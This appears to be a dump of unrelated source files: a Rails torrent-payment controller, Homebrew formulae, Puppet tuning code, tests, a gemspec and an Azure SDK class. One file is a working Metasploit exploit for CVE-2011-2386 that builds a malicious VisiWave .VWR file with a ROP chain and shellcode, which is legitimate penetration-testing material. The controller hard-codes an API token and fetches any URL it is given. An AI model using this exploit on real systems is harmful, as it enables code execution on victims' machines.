create_invoice
end
tx_id = current_user.bitpay_invoices.find_by_name("sign_up")
response = HTTParty.get("https://test.bitpay.com/invoices/#{tx_id.bitpay_invoice}")
body = JSON.parse(response.body)
if body["error"] || body["data"]["status"] == "expired"
tx_id.destroy
elsif body["data"]["status"] == "confirmed"
tx_id.paid = true
current_user.active = true;
tx_id.save
current_user.save
redirect_to root_path
end
end
def dashboard
if user_signed_in?
@personal_downloads = current_user.downloads
end
@public_downloads = Download.where({user_id: nil}).limit(10)
end
def download
@input_file = params["file"]
@returned_file = save_to_tempfile(@input_file)
@opened_file = TorrentFile.open @returned_file
@output_hash = @opened_file.to_h
if @output_hash["info"]["length"]
@size = @output_hash["info"]["length"]
else
@size = 0
@output_hash["info"]["files"].each { |targ| @size += targ["length"]}
end
@size = @size / 1000000000.0
@name = @output_hash["info"]["name"]
if user_signed_in? && current_user.bitpay_invoices
@user_purchase = current_user.bitpay_invoices.find_by_name(@name)
if @user_purchase && @user_purchase.paid
redirect_to dashboard_path
return
end
else
@public_purchase = BitpayInvoice.find_by_name(@name)
if @public_purchase && @public_purchase.paid
redirect_to dashboard_path
return
end
end
if user_signed_in?
@total_price = (0.03 + 0.09) * @size
else
@total_price = (0.025) + (0.03 + 0.09) * @size
end
@total_price = @total_price.round(2)
if BitpayInvoice.find_by_name(@name)
tx_id = BitpayInvoice.find_by_name(@name)
response = HTTParty.get("https://test.bitpay.com/invoices/#{tx_id.bitpay_invoice}")
body = JSON.parse(response.body)
if body["error"] || body["data"]["status"] == "expired"
tx_id.destroy
dl = Download.find_by_name(@name).destroy
create_payment(@total_price, @name, params["file"])
elsif body["data"]["status"] == "complete" || body["data"]["status"] == "confirmed"
dl = Download.find_by_name(@name)
tx_id.paid = true
dl.status = "Beginning download"
tx_id.save
dl.save
trigger_download(dl)
end
else
create_payment(@total_price, @name, params["file"])
end
end
def trigger_download(dl)
dl.status = "Downloading"
dl.save
#directory = Dir.mkdir(Rails.public_path + '/' + Digest::MD5.hexdigest(dl.name))
#bt = RubyTorrent::BitTorrent.new(filename, directory)
#thread = Thread.new do
#until bt.complete?
#puts "#{bt.percent_completed}% done"
#sleep 5
#end
#end
#bt.on_event(self, :complete) { complete_download(dl) }
end
def complete_download(dl)
dl.downloaded_at = Time.now
dl.status = "Downloaded"
dl.save
end
def save_to_tempfile(url)
uri = URI.parse(url)
Net::HTTP.start(uri.host, uri.port) do |http|
resp = http.get(uri.path)
file = Tempfile.new(['temp','.torrent'], Dir.tmpdir)
file.binmode
file.write(resp.body)
file.flush
file
end
end
def create_payment(total_price, name, url)
response = HTTParty.post("https://test.bitpay.com/invoices", body: {"token" => "5F4A71wnHnMAZd69Gs7TJHzEEQsxyBL3RsVEtbgpGYs2", "price" => total_price, "currency" => "USD", "transactionSpeed" => "high"})
body = JSON.parse(response.body)
if user_signed_in?
invoice = BitpayInvoice.create(user_id: current_user.id, bitpay_invoice: body["data"]["id"], name: name)
download = Download.create(user_id: current_user.id, torrent_url: url, name: name, status: "Awaiting payment")
else
invoice = BitpayInvoice.create(bitpay_invoice: body["data"]["id"], name: name)
download = Download.create(torrent_url: url, name: name, status: "Awaiting payment")
end
invoice.save
download.save
end
def create_invoice
response = HTTParty.post("https://test.bitpay.com/invoices", body: {"token" => "5F4A71wnHnMAZd69Gs7TJHzEEQsxyBL3RsVEtbgpGYs2", "price" => "0.25", "currency" => "USD", "transactionSpeed" => "high"})
body = JSON.parse(response.body)
invoice = BitpayInvoice.create(user_id: current_user.id, bitpay_invoice: body["data"]["id"], name: "sign_up")
invoice.save
end
end
| 31.013986 | 204 | 0.67779 |
91ba8e6300180d9a603e0c8ab304fe2c66af764e | 1,398 | class Wimlib < Formula
desc "Library to create, extract, and modify Windows Imaging files"
homepage "https://wimlib.net/"
url "https://wimlib.net/downloads/wimlib-1.10.0.tar.gz"
sha256 "989b1b02f246c480dec10469374f4235d15a3d5e5ae054452405305af5007f55"
bottle do
cellar :any
sha256 "820662984db7e93d3a437a1e9a04a4dc52d66ca12caef609a51438e636477348" => :sierra
sha256 "01953339d96184ffadd03080f40d71238f106d820965ddf8147d412fb3b711d5" => :el_capitan
sha256 "1708e5941ec5985f5575f41da85893ba05b898dfbb562eee1433163225ec783f" => :yosemite
end
depends_on "pkg-config" => :build
depends_on "homebrew/fuse/ntfs-3g" => :optional
depends_on "openssl"
def install
# fuse requires librt, unavailable on OSX
args = %W[
--disable-debug
--disable-dependency-tracking
--disable-silent-rules
--without-fuse
--prefix=#{prefix}
]
args << "--without-ntfs-3g" if build.without? "ntfs-3g"
system "./configure", *args
system "make", "install"
end
test do
# make a directory containing a dummy 1M file
mkdir("foo")
system "dd", "if=/dev/random", "of=foo/bar", "bs=1m", "count=1"
# capture an image
ENV.append "WIMLIB_IMAGEX_USE_UTF8", "1"
system "#{bin}/wimcapture", "foo", "bar.wim"
assert File.exist?("bar.wim")
# get info on the image
system "#{bin}/wiminfo", "bar.wim"
end
end
| 29.125 | 92 | 0.690272 |
916b4c102ff25ce7668a1237b3972b61a4a954a0 | 4,857 | ##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'VisiWave VWR File Parsing Vulnerability',
'Description' => %q{
This module exploits a vulnerability found in VisiWave's Site Survey Report application.
When processing .VWR files, VisiWaveReport.exe attempts to match a valid pointer based on the 'Type'
property (valid ones include 'Properties', 'TitlePage', 'Details', 'Graph', 'Table', 'Text',
'Image'), but if a match isn't found, the function that's supposed to handle this routine
ends up returning the input as a pointer, and later used in a CALL DWORD PTR [EDX+10]
instruction. This allows attackers to overwrite it with any arbitrary value, and results code
execution. A patch is available at visiwave.com; the fix is done by XORing the return value as
null if no match is found, and then it is validated before use.
NOTE: During installation, the application will register two file handle's, VWS and VWR and allows a
victim user to 'double click' the malicious VWR file and execute code. This module was also built
to bypass ASLR and DEP.
},
'License' => MSF_LICENSE,
'Author' =>
[
'mr_me', # original discovery & msf exploit
'TecR0c' # msf exploit
],
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2011-2386' ],
[ 'OSVDB', '72464'],
[ 'URL', 'http://www.visiwave.com/blog/index.php?/archives/4-Version-2.1.9-Released.html' ],
[ 'URL', 'http://www.stratsec.net/Research/Advisories/VisiWave-Site-Survey-Report-Trusted-Pointer-%28SS-20'],
],
'Payload' =>
{
'Space' => 2000,
'BadChars' => "\x00\x0a\x0d",
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows XP SP3/Windows 7 SP0',
{
'Offset' => 3981, # offset to rop gadgets
'Pointer' => 0x007AF938, # POP R32; POP R32; POP R32; ADD ESP 50; RETN ("magic" pointer)
}
],
],
'Privileged' => false,
'DisclosureDate' => 'May 20 2011',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.vwr']),
], self.class)
end
def exploit
# Allowing nulls in our rop chain is like giving gold to midas.
# instructions taken from the applications non aslr modules
# libcurl.dll, VisiWaveReport.exe and blah blah
rop_gadgets =
[
0x1001AFBD, # INC EBP; PUSH ESP; POP EDI; POP ESI; POP EBP; POP EBX; RET
0xc0fff333, # junk
0xc0fff333, # junk
0x000004cf, # lwSize 1231 bytes
0x100017DD, # POP ECX; RETN
0x10037a60, # Writeable address from .data of libcurl.dll
0x10011104, # POP EDX; RETN
0x00000040, # RWX for VirtualProtect()
0x10026E4D, # MOV EAX,EDI # POP EDI # RETN
0x10002ac6, # RETN
0x10022641, # ADD EAX, 20; RETN
0x10022641, # ADD EAX, 20; RETN
0x10022641, # ADD EAX, 20; RETN
0x10022641, # ADD EAX, 20; RETN
0x10022641, # ADD EAX, 20; RETN
0x10022641, # ADD EAX, 20; RETN
0x004048B1, # XCHG EAX,EBP
0x1001BD3F, # POP EAX; RETN
0x10032048, # IAT Address - constant pointer to VirtualProtect()
0x1000FA4A, # MOV EAX,DWORD PTR DS:[EAX]; RETN
0x00657fd7, # XCHG EAX,ESI; RETN
0x1000af40, # PUSHAD; RET
].pack("V*")
# grab the pointer to our buffer
pointer = [target["Pointer"]].pack("V")
sploit = pointer # begin life in EDX
sploit << rand_text_alphanumeric(target["Offset"]) # massive offset
sploit << rop_gadgets # rop chain
sploit << make_nops(300) # safe landing
sploit << payload.encoded # profit!
vwr_data = "FileType: SSREPORT\r\n"
vwr_data << "Product: VisiWave Site Survey, 1.6.5 Beta\r\n"
vwr_data << "FileVersion: 10\r\n"
vwr_data << "Item: Global Properties\r\n"
vwr_data << "Checked: 1\r\n"
vwr_data << "Type: #{sploit}\r\n"
vwr_data << "SurveyFile: C:\\Program Files\\VisiWave Site Survey\\Samples\\SampleData.vws\r\n"
vwr_data << "FloorPlanImageReport: C:\\WINDOWS\\Web\\bullet.gif\r\n"
vwr_data << "DefaultOrientation: 0\r\n"
vwr_data << "Header:\r\n"
vwr_data << "Footer:\r\n"
vwr_data << "LeftMargin: 100\r\n"
vwr_data << "RightMargin: 100\r\n"
vwr_data << "TopMargin: 50\r\n"
vwr_data << "BottomMargin: 50\r\n"
vwr_data << "Item: #{rand_text_alpha(3)}\r\n"
vwr_data << "Checked: 1\r\n"
print_status("Creating '#{datastore['FILENAME']}'...")
file_create(vwr_data)
end
end
| 34.942446 | 114 | 0.64546 |
bb3d9815065c492f0f232c4e0f573d3594ac4e6f | 1,359 | require "rails"
require "rails/generators"
require "rails/generators/active_record"
module Hayfork
module Generators
class CreateOrReplaceMigration < Rails::Generators::Actions::CreateMigration
def initialize(base, destination, data, config = {})
config[:force] = true
super
end
def identical?
false
end
end
module CreateOrReplaceMigrationConcern
def create_migration(destination, data, config = {}, &block)
action CreateOrReplaceMigration.new(self, destination, block || data.to_s, config)
end
end
class RebuildGenerator < ActiveRecord::Generators::Base
include CreateOrReplaceMigrationConcern
source_root File.expand_path("templates", __dir__)
# `argument :name` is defined in ::NamedBase,
# but we override it to provide a default value.
argument :name, type: :string, default: "haystack"
def copy_migration
migration_template "migrations/rebuild.rb", "#{db_migrate_path}/rebuild_#{table_name}.rb", migration_version: migration_version
end
def table_name
return "haystack" if class_name == "Haystack"
super
end
def migration_version
return unless Rails::VERSION::MAJOR >= 5
"[#{Rails::VERSION::MAJOR}.#{Rails::VERSION::MINOR}]"
end
end
end
end
| 27.18 | 135 | 0.671818 |
7915200e188d4e770bed8bf76445b2cef2538409 | 20,023 | # Note: Calculate the number of jrubies by the number of jrubies that will fit into RAM rather than CPU.
module PuppetX
module Puppetlabs
# Query infrastructure and show current, or calculate optimized settings.
class Tune
# Calculate optimized settings.
class Calculate
# Calculon Compute!
def initialize(options)
@defaults = {}
# For use when estimating capacity.
@defaults[:compile_time_factor] = 2
# Round up when memory is close to the next level of our leveled settings. See fit_to_memory().
@defaults[:fit_to_memory_percentage] = 5
# Memory reserved for the operating system (and other applications).
@defaults[:memory_reserved_for_os_percentage] = 0.20
@options = {}
# Users may override these defaults via command line options.
@options[:memory_per_jruby] = options[:memory_per_jruby] || 0
@options[:memory_reserved_for_os] = options[:memory_reserved_for_os] || 0
Puppet.debug("Using optional #{@options[:memory_per_jruby]} MB RAM per JRuby") if @options[:memory_per_jruby] != 0
Puppet.debug("Using optional #{@options[:memory_reserved_for_os]} MB RAM reserved for the operating system") if @options[:memory_reserved_for_os] != 0
end
#
# PE Infrastructure Roles
#
# Masters, Replicas, and Compilers, in Monolithic or Split Infrastructures
# Services: pe-puppetserver and (optionally) all other services.
# Levels and ratios model https://puppet.com/docs/pe/latest/configuring/tuning_monolithic.html
def calculate_master_settings(node)
percent_cpu_puppetdb = 0.25
minimum_cpu_puppetdb = 1
maximum_cpu_puppetdb = (node['resources']['cpu'] * 0.50).to_i
minimum_cpu_puppetserver = 2
maximum_cpu_puppetserver = 24
percent_ram_database = 0.25
percent_ram_puppetdb = 0.10
percent_ram_orchestrator = 0.08
percent_ram_console = 0.08
percent_ram_activemq = 0.08
minimum_ram_puppetserver = 512
minimum_ram_code_cache = 96
maximum_ram_code_cache = 2048
ram_per_jruby = fit_to_memory(node['resources']['ram'], 512, 768, 1024)
ram_per_jruby_code_cache = 96
minimum_ram_database = 2048
maximum_ram_database = 16384
minimum_ram_puppetdb = 512
maximum_ram_puppetdb = 8192
minimum_ram_orchestrator = 512
maximum_ram_orchestrator = 1024
minimum_ram_console = 512
maximum_ram_console = 1024
minimum_ram_activemq = 256
maximum_ram_activemq = 512
cpu_reserved = 1
ram_reserved = select_reserved_memory(node['resources']['ram'])
# https://github.com/puppetlabs/puppet-enterprise-modules/blob/irving/modules/puppet_enterprise/manifests/profile/database.pp
default_database_max_connections = 400
percent_databse_connections = 1.10
settings = initialize_settings(node)
# Optionally use memory_per_jruby, if defined.
ram_per_jruby = @options[:memory_per_jruby] if @options[:memory_per_jruby] != 0
# Optionally use current_memory_per_jruby, if defined.
ram_per_jruby = node['current_memory_per_jruby'] if node['current_memory_per_jruby'] && node['current_memory_per_jruby'] != 0
# Reallocate resources between puppetserver and puppetdb, if this host is a monolithic master or replica master, with compile masters or compilers.
if node['type']['is_monolithic_master'] || node['type']['is_replica_master']
if node['infrastructure']['with_compile_masters']
percent_cpu_puppetdb = 0.50
percent_ram_puppetdb = 0.15
end
end
# ORCH-2384: Orchestrator in PE 2019.2 has jrubies, and requires (estimated) one processor and additional memory.
# Reallocate the processor associated with one jruby from puppetserver to orchestrator.
if node['classes']['orchestrator'] && node['type']['with_orchestrator_jruby']
cpu_reserved += 1
end
# The Vegas Renormalization: allow for testing with vmpooler (2 CPU / 6 GB RAM) VMs.
if node['resources']['cpu'] < 3
minimum_cpu_puppetserver = 1
maximum_cpu_puppetserver = 1
cpu_reserved = 1
ram_reserved = 256
end
# Do not allocate memory for reserved_code_cache, depending upon jruby version.
unless node['type']['with_jruby9k_enabled']
minimum_ram_code_cache = 0
ram_per_jruby_code_cache = 0
end
# Allocate processors and memory for PE Infrastructure services ...
if node['classes']['database']
ram_database = (node['resources']['ram'] * percent_ram_database).to_i.clamp(minimum_ram_database, maximum_ram_database)
settings['params']['puppet_enterprise::profile::database::shared_buffers'] = "#{ram_database}MB"
settings['totals']['RAM']['used'] += ram_database
end
if node['classes']['puppetdb']
# Reallocate resources between puppetserver and puppetdb, if this host is a compiler (puppetserver plus puppetdb).
if node['type']['is_compile_master'] || node['type']['is_compiler']
percent_cpu_puppetdb = 0.25
minimum_cpu_puppetdb = 1
maximum_cpu_puppetdb = 3
end
command_processing_threads = (node['resources']['cpu'] * percent_cpu_puppetdb).to_i.clamp(minimum_cpu_puppetdb, maximum_cpu_puppetdb)
settings['params']['puppet_enterprise::puppetdb::command_processing_threads'] = command_processing_threads
settings['totals']['CPU']['used'] += command_processing_threads
ram_puppetdb = (node['resources']['ram'] * percent_ram_puppetdb).to_i.clamp(minimum_ram_puppetdb, maximum_ram_puppetdb)
settings['params']['puppet_enterprise::profile::puppetdb::java_args'] = { 'Xms' => "#{ram_puppetdb}m", 'Xmx' => "#{ram_puppetdb}m" }
settings['totals']['RAM']['used'] += ram_puppetdb
end
if node['classes']['orchestrator']
ram_orchestrator = (node['resources']['ram'] * percent_ram_orchestrator).to_i.clamp(minimum_ram_orchestrator, maximum_ram_orchestrator)
if node['type']['with_orchestrator_jruby']
# ORCH-2384: Orchestrator in PE 2019.2 has jrubies, and requires (estimated) one processor and additional memory.
# Reallocate the memory associated with one jruby from puppetserver to orchestrator.
ram_orchestrator += ram_per_jruby + ram_per_jruby_code_cache
# orchestrator_jruby_max_active_instances = 8
# ram_orchestrator_code_cache = orchestrator_jruby_max_active_instances * ram_per_jruby_code_cache
# settings['params']['puppet_enterprise::profile::orchestrator::jruby_max_active_instances'] = orchestrator_jruby_max_active_instances
# Note: orchestrator_jruby_max_active_instances is not a dedicated allocation, do not add it to settings['totals']['CPU']['used'].
# settings['params']['puppet_enterprise::profile::orchestrator::reserved_code_cache'] = ram_orchestrator_code_cache
# settings['totals']['RAM']['used'] += ram_orchestrator_code_cache
end
settings['params']['puppet_enterprise::profile::orchestrator::java_args'] = { 'Xms' => "#{ram_orchestrator}m", 'Xmx' => "#{ram_orchestrator}m" }
settings['totals']['RAM']['used'] += ram_orchestrator
end
if node['classes']['console']
ram_console = (node['resources']['ram'] * percent_ram_console).to_i.clamp(minimum_ram_console, maximum_ram_console)
settings['params']['puppet_enterprise::profile::console::java_args'] = { 'Xms' => "#{ram_console}m", 'Xmx' => "#{ram_console}m" }
settings['totals']['RAM']['used'] += ram_console
end
if node['classes']['amq::broker']
ram_activemq = (node['resources']['ram'] * percent_ram_activemq).to_i.clamp(minimum_ram_activemq, maximum_ram_activemq)
settings['params']['puppet_enterprise::profile::amq::broker::heap_mb'] = ram_activemq
settings['totals']['RAM']['used'] += ram_activemq
end
# Note: puppetserver is not allocated a percentage of memory: it is initially allocated all unused memory.
ram_puppetserver = (node['resources']['ram'] - ram_reserved - settings['totals']['RAM']['used'])
if ram_puppetserver < (minimum_ram_puppetserver + minimum_ram_code_cache)
Puppet.debug("Error: available memory for puppetserver: #{ram_puppetserver} MB is less than minimum required: #{minimum_ram_puppetserver} + #{minimum_ram_code_cache} MB")
return
end
# Note: jruby_max_active_instances is constrained based on both how many jrubies fit into unallocated memory and unallocated processors.
maximum_cpu_puppetserver = (node['resources']['cpu'] - cpu_reserved - settings['totals']['CPU']['used']).clamp(minimum_cpu_puppetserver, maximum_cpu_puppetserver)
max_jrubies_in_ram_puppetserver = (ram_puppetserver / (ram_per_jruby + ram_per_jruby_code_cache)).to_i
puppetserver_jruby_max_active_instances = max_jrubies_in_ram_puppetserver.clamp(minimum_cpu_puppetserver, maximum_cpu_puppetserver)
settings['params']['puppet_enterprise::master::puppetserver::jruby_max_active_instances'] = puppetserver_jruby_max_active_instances
settings['totals']['CPU']['used'] += puppetserver_jruby_max_active_instances
ram_puppetserver = [minimum_ram_puppetserver, (puppetserver_jruby_max_active_instances * ram_per_jruby)].max
settings['params']['puppet_enterprise::profile::master::java_args'] = { 'Xms' => "#{ram_puppetserver}m", 'Xmx' => "#{ram_puppetserver}m" }
settings['totals']['RAM']['used'] += ram_puppetserver
if node['type']['with_jruby9k_enabled']
code_cache_based_upon_jrubies = puppetserver_jruby_max_active_instances * ram_per_jruby_code_cache
ram_puppetserver_code_cache = code_cache_based_upon_jrubies.clamp(minimum_ram_code_cache, maximum_ram_code_cache)
settings['params']['puppet_enterprise::master::puppetserver::reserved_code_cache'] = "#{ram_puppetserver_code_cache}m"
settings['totals']['RAM']['used'] += ram_puppetserver_code_cache
end
settings['totals']['MB_PER_JRUBY'] = ram_per_jruby
# Detune puppetdb to avoid making too many connections to the database and disable garbage collection, if this host is a compiler (puppetserver with puppetdb).
if node['classes']['puppetdb'] && (node['type']['is_compile_master'] || node['type']['is_compiler'])
read_maximum_pool_size = puppetserver_jruby_max_active_instances + [1, (puppetserver_jruby_max_active_instances / 2).to_i].max
write_maximum_pool_size = (command_processing_threads * 2)
settings['params']['puppet_enterprise::puppetdb::read_maximum_pool_size'] = read_maximum_pool_size
settings['params']['puppet_enterprise::puppetdb::write_maximum_pool_size'] = write_maximum_pool_size
settings['params']['puppet_enterprise::profile::puppetdb::gc_interval'] = 0
end
# Increase max_connections when a large number of connections from compilers exceeds the default.
if node['classes']['database'] && node['infrastructure']['compiler_connections']
if node['infrastructure']['compiler_connections'] > default_database_max_connections
settings['params']['puppet_enterprise::profile::database::max_connections'] = (node['infrastructure']['compiler_connections'] * percent_databse_connections).to_i
end
end
# Do not return any settings when overallocating.
if settings['totals']['CPU']['used'] > settings['totals']['CPU']['total']
Puppet.debug("Error: calculations overallocated processors: #{settings}")
return
end
if (settings['totals']['RAM']['used'] + ram_reserved) > settings['totals']['RAM']['total']
Puppet.debug("Error: calculations overallocated memory: #{settings}")
return
end
settings
end
# Console Hosts in Split Infrastructures
# Services: pe-console-services
def calculate_console_settings(node)
percent_ram_console = 0.75
minimum_ram_console = 512
maximum_ram_console = 4096
settings = initialize_settings(node)
ram_console = (node['resources']['ram'] * percent_ram_console).to_i.clamp(minimum_ram_console, maximum_ram_console)
settings['params']['puppet_enterprise::profile::console::java_args'] = { 'Xms' => "#{ram_console}m", 'Xmx' => "#{ram_console}m" }
settings['totals']['RAM']['used'] += ram_console
settings
end
# PuppetDB Hosts in Split Infrastructures
# Services: pe-puppetdb and (by default, but optionally) pe-postgresql
def calculate_puppetdb_settings(node)
percent_cpu_puppetdb = 0.50
minimum_cpu_puppetdb = 1
maximum_cpu_puppetdb = (node['resources']['cpu'] * percent_cpu_puppetdb).to_i
percent_ram_puppetdb = 0.50
minimum_ram_puppetdb = 512
maximum_ram_puppetdb = 8192
settings = initialize_settings(node)
if node['classes']['database']
percent_ram_puppetdb = 0.25
database_settings = calculate_database_settings(node)
settings['params'].merge!(database_settings['params'])
settings['totals']['CPU']['used'] += database_settings['totals']['CPU']['used']
settings['totals']['RAM']['used'] += database_settings['totals']['RAM']['used']
end
command_processing_threads = [minimum_cpu_puppetdb, maximum_cpu_puppetdb].max
settings['params']['puppet_enterprise::puppetdb::command_processing_threads'] = command_processing_threads
settings['totals']['CPU']['used'] += command_processing_threads
ram_puppetdb = (node['resources']['ram'] * percent_ram_puppetdb).to_i.clamp(minimum_ram_puppetdb, maximum_ram_puppetdb)
settings['params']['puppet_enterprise::profile::puppetdb::java_args'] = { 'Xms' => "#{ram_puppetdb}m", 'Xmx' => "#{ram_puppetdb}m" }
settings['totals']['RAM']['used'] += ram_puppetdb
settings
end
# External PostgreSQL Hosts in Monolithic and/or PuppetDB Hosts in Split Infrastructures
# Services: pe-postgresql
def calculate_database_settings(node)
percent_ram_database = 0.25
minimum_ram_database = 2048
maximum_ram_database = 16384
# https://github.com/puppetlabs/puppet-enterprise-modules/blob/irving/modules/puppet_enterprise/manifests/profile/database.pp
default_database_max_connections = 400
percent_databse_connections = 1.10
settings = initialize_settings(node)
ram_database = (node['resources']['ram'] * percent_ram_database).to_i.clamp(minimum_ram_database, maximum_ram_database)
settings['params']['puppet_enterprise::profile::database::shared_buffers'] = "#{ram_database}MB"
settings['totals']['RAM']['used'] += ram_database
# Increase max_connections when a large number of connections from compilers exceeds the default.
if node['infrastructure']['compiler_connections']
if node['infrastructure']['compiler_connections'] > default_database_max_connections
settings['params']['puppet_enterprise::profile::database::max_connections'] = (node['infrastructure']['compiler_connections'] * percent_databse_connections).to_i
end
end
settings
end
# Return a new settings structure.
def initialize_settings(node)
{
'params' => {},
'totals' => {
'CPU' => { 'total' => node['resources']['cpu'], 'used' => 0 },
'RAM' => { 'total' => node['resources']['ram'], 'used' => 0 },
},
}
end
#
# Utilities
#
# Estimate a reasonable sample of agent runs based upon node count and run interval.
def calculate_run_sample(active_nodes, run_interval)
maximum = 10000
seconds_per_day = 86400
# If running continuously ...
return [active_nodes, maximum].min if run_interval.zero?
runs_per_day = (seconds_per_day / run_interval).to_i
# If running less than once per day ...
return [active_nodes * 7, maximum].min if runs_per_day < 1
[active_nodes * runs_per_day, maximum].min
end
# Little's Law
#
# L = λ * W
#
# Where:
#
# L = Number of requests in the queue.
# λ = Average effective arrival rate of requests.
# W = Average time spent processing a request.
# Estimate the theoretical maximum number of nodes that can managed by an infrastructure.
def calculate_maximum_nodes(average_compile_time, available_jrubies, run_interval)
jruby_lock_time = average_compile_time.to_f * @defaults[:compile_time_factor]
((run_interval.to_f * available_jrubies.to_f) / jruby_lock_time.to_f).ceil
end
# Estimate the theoretical minimum number of jrubies required to manage an infrastructure.
def calculate_minimum_jrubies(active_nodes, average_compile_time, run_interval)
jruby_lock_time = average_compile_time.to_f * @defaults[:compile_time_factor]
((active_nodes.to_f * jruby_lock_time.to_f) / run_interval.to_f).ceil
end
# Return the option or the default.
def select_reserved_memory(memory)
return @options[:memory_reserved_for_os] if @options[:memory_reserved_for_os] != 0
(memory * @defaults[:memory_reserved_for_os_percentage]).to_i
end
# Model https://puppet.com/docs/pe/latest/configuring/tuning_monolithic.html
def fit_to_memory(memory, small, medium, large)
# Round up to the nearest power of two (31500 -> 32768) if within a percentage.
target_memory = nearest_power_of_two(memory)
if (memory < target_memory) && within_percent?(memory, target_memory, @defaults[:fit_to_memory_percentage])
Puppet.debug("Rounding #{memory} up to #{target_memory} for fit_to_memory")
memory = target_memory
end
return small if memory <= 8192
return medium if memory <= 16384
return medium if memory < 32768
Puppet.debug('Using a maximum value for fit_to_memory')
return large if memory >= 32768
end
# Test if a number is within a percentage of another number.
def within_percent?(actual, target, percentage)
return false if actual == target
(Float(target - actual) / target * 100).ceil <= percentage
end
# Return a number as a computer-science number.
def nearest_power_of_two(number)
return 0 if number <= 0
exponent = Math.log2 number
higher_power = 2**exponent.ceil
lower_power = 2**exponent.floor
((higher_power - number) <= (number - lower_power)) ? higher_power : lower_power
end
end
end
end
end
| 47.67381 | 182 | 0.650052 |
d58e88526ef0e7fa29061249fac18451dab96851 | 454 | cask 'navicat-for-oracle' do
version '15.0.4'
sha256 '93853defa51d98b659de55a0f313b8034399fd2ad81a9bafabd0704aae63c5ad'
url "http://download.navicat.com/download/navicat#{version.major_minor.no_dots}_ora_en.dmg"
appcast 'https://updater.navicat.com/mac/navicat_updates.php?appName=Navicat%20for%20Oracle&appLang=en'
name 'Navicat for Oracle'
homepage 'https://www.navicat.com/products/navicat-for-oracle'
app 'Navicat for Oracle.app'
end
| 37.833333 | 105 | 0.790749 |
28f6e6f4617f6b1ecea34ef5a77a1ff4472741af | 1,635 | require 'rails_helper'
RSpec.describe Offboard::RemoveSuppliersFromLots do
it 'raises an error if the expected headers are not present' do
bad_headers_csv_path = Rails.root.join('spec', 'fixtures', 'framework_suppliers_bad_headers.csv')
expect { Offboard::RemoveSuppliersFromLots.new(bad_headers_csv_path) }.to raise_error(
ArgumentError, /Missing headers in CSV file: salesforce_id/
)
end
describe '#run' do
let(:csv_path) { Rails.root.join('spec', 'fixtures', 'suppliers-to-offboard-from-framework-lots.csv') }
let(:offboarder) { Offboard::RemoveSuppliersFromLots.new(csv_path, logger: Logger.new('/dev/null')) }
let!(:framework) do
FactoryBot.create(:framework, short_name: 'FM1234')
end
let(:lot_1) { framework.lots.create!(number: '1') }
let(:lot_2a) { framework.lots.create!(number: '2a') }
let!(:supplier) do
FactoryBot.create(:supplier, salesforce_id: '001b000003FAKEFAKE')
end
let!(:agreement) do
FactoryBot.create(:agreement, supplier: supplier, framework: framework) do |agreement|
[lot_1, lot_2a].each do |framework_lot|
agreement.agreement_framework_lots.create!(framework_lot: framework_lot)
end
end
end
it 'offboards the suppliers' do
expect { offboarder.run }.to change { agreement.agreement_framework_lots.count }.by(-1)
end
context 'when the CSV references a framework that is not published' do
it 'raises an error' do
framework.update(published: false)
expect { offboarder.run }.to raise_error(ActiveRecord::RecordNotFound)
end
end
end
end
| 34.0625 | 107 | 0.697248 |
5d13e1d5c401ca1830ffe96cecc6bc6dfce5e35c | 1,268 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'roadie_actionmailer/version'
Gem::Specification.new do |spec|
spec.name = "roadie_actionmailer"
spec.version = RoadieActionmailer::VERSION
spec.authors = ["Tomáš Celizna", "Asger Behncke Jacobsen"]
spec.email = ["[email protected]", "[email protected]"]
spec.summary = %q{ActionMailer interceptor to inline CSS using the Roadie gem.}
spec.description = %q{ActionMailer interceptor to inline CSS using the Roadie gem.}
spec.homepage = "https://github.com/tomasc/roadie_actionmailer"
spec.license = "MIT"
spec.files = `git ls-files -z`.split("\x0")
spec.executables = spec.files.grep(%r{^bin/}) { |f| File.basename(f) }
spec.test_files = spec.files.grep(%r{^(test|spec|features)/})
spec.require_paths = ["lib"]
spec.add_dependency "rails", ">= 3"
spec.add_dependency "roadie"
spec.add_development_dependency "bundler"
spec.add_development_dependency "rake"
spec.add_development_dependency "coveralls"
spec.add_development_dependency "guard"
spec.add_development_dependency "guard-minitest"
spec.add_development_dependency "minitest"
end
| 40.903226 | 87 | 0.708202 |
e95f96325dcaba4b82fbc0593aa9f080fb2fae3f | 23,851 | # Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::ADHybridHealthService::Mgmt::V2014_01_01
#
# REST APIs for Azure Active Directory Connect Health
#
class AddsServiceMembersOperations
include MsRestAzure
#
# Creates and initializes a new instance of the AddsServiceMembersOperations class.
# @param client service class for accessing basic functionality.
#
def initialize(client)
@client = client
end
# @return [ADHybridHealthService] reference to the ADHybridHealthService
attr_reader :client
#
# Gets the details of the Active Directory Domain servers, for a given Active
# Directory Domain Service, that are onboarded to Azure Active Directory
# Connect Health.
#
# @param service_name [String] The name of the service.
# @param filter [String] The server property filter to apply.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [Array<AddsServiceMember>] operation results.
#
def list(service_name, filter:nil, custom_headers:nil)
first_page = list_as_lazy(service_name, filter:filter, custom_headers:custom_headers)
first_page.get_all_items
end
#
# Gets the details of the Active Directory Domain servers, for a given Active
# Directory Domain Service, that are onboarded to Azure Active Directory
# Connect Health.
#
# @param service_name [String] The name of the service.
# @param filter [String] The server property filter to apply.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def list_with_http_info(service_name, filter:nil, custom_headers:nil)
list_async(service_name, filter:filter, custom_headers:custom_headers).value!
end
#
# Gets the details of the Active Directory Domain servers, for a given Active
# Directory Domain Service, that are onboarded to Azure Active Directory
# Connect Health.
#
